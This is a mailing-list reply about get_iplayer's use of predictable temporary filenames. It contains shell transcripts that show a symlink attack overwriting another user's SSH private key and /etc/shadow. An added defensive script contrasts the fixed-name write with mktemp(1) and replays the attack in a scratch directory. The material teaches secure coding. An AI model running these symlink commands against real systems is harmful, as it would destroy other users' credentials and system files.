On 2013-08-02 09:26, Paul Verrall wrote:
> However, as get_iplayer's output does not contain any sensitive info,
> and more importantly the output is not read back into a process, we're
> probably safe in this instance, probably.

No, you've missed the point.

Bad:

$ whoami
evilgenius
$ ln -s /home/victim/.ssh/id_rsa /tmp/mydangeroustempfile
$ whoami
victim
$ echo "you lose" > /tmp/mydangeroustempfile
$ cat ~/.ssh/id_rsa
you lose

If victim didn't back up his keys, he's SOL. evilgenius does not need to be a privileged user to carry out this attack.

Worse:

$ whoami
evilgenius
$ ln -s /etc/shadow /tmp/myworsetempfile
$ su -
# whoami
root
# get_iplayer --refresh > /tmp/myworsetempfile
# cat /etc/shadow
get_iplayer v2.83, Copyright (C) 2008-2010 Phil Lewis
This program comes with ABSOLUTELY NO WARRANTY; for details use --warranty. This is free software, and you are welcome to redistribute it under certain
  conditions; use --conditions for details.
<etc>

The only safe way to deal with this is mktemp(1) (and don't run get_iplayer as root, though I hope that goes without saying).


--
Jonathan Wiltshire                                      j...@debian.org
Debian Developer                         http://people.debian.org/~jmw

4096R: 0xD3524C51 / 0A55 B7C5 1223 3942 86EC  74C3 5394 479D D352 4C51

<directhex> i have six years of solaris sysadmin experience, from
            8->10. i am well qualified to say it is made from bonghits
                        layered on top of bonghits
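As an added example (not code from this thread or from get_iplayer itself), the script below puts the fixed-name redirect criticised above beside the mktemp(1) alternative, plus a pre-write check for code that must keep a fixed name; the `WORK` scratch directory, the `victim_secret` file and the `fixed.tmp` name are all constructed for the demonstration, so nothing real is touched.

```shell
#!/bin/sh
# Scratch directory standing in for /tmp; every path below is constructed
# inside it so the demonstration touches nothing real.
WORK=$(mktemp -d) || exit 1

# Unsafe: a fixed, predictable name. The redirect follows whatever already
# sits at that path, so a planted symlink decides where the data lands.
unsafe_write() {                        # $1 = fixed path, $2 = data
    printf '%s\n' "$2" > "$1"
}

# Safe: mktemp(1) creates a brand-new file (O_EXCL, mode 0600) under a name
# nobody could have predicted, so there is nothing to pre-create.
safe_write() {                          # $1 = data; prints the file it made
    tmp=$(mktemp "$WORK/get_iplayer.XXXXXX") || return 1
    printf '%s\n' "$1" > "$tmp" && printf '%s\n' "$tmp"
}

# Pre-write check for code that must keep a fixed name anyway: refuse a
# symlink, a file owned by someone else, or a world-writable directory
# without the sticky bit. Returns 0 only when every check passes.
check_target() {                        # $1 = intended output path
    dir=$(dirname "$1")
    [ -L "$1" ] && return 1
    [ -e "$1" ] && [ ! -O "$1" ] && return 1
    bad=$(find "$dir" -maxdepth 0 -perm -o+w ! -perm -1000 -print 2>/dev/null)
    [ -z "$bad" ]
}

# Replay the thread's scenario in the scratch area: a planted link turns a
# fixed-name redirect into an overwrite of another file, the check catches
# it, and the mktemp version writes to a fresh regular file instead.
demo() {
    victim="$WORK/victim_secret"; printf 'SECRET\n' > "$victim"
    planted="$WORK/fixed.tmp";   ln -s "$victim" "$planted"
    check_target "$planted" && return 1      # must be refused
    unsafe_write "$planted" "you lose"       # silently goes through the link
    [ "$(cat "$victim")" = "you lose" ] || return 1
    out=$(safe_write "you win") || return 1
    [ ! -L "$out" ] && [ "$(cat "$out")" = "you win" ]
}
```

Run `demo` to see the scenario end to end; the sticky-bit test in `check_target` is what makes a 1777 directory such as /tmp acceptable while a plain 0777 directory is refused.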

_______________________________________________
get_iplayer mailing list
get_iplayer@lists.infradead.org
http://lists.infradead.org/mailman/listinfo/get_iplayer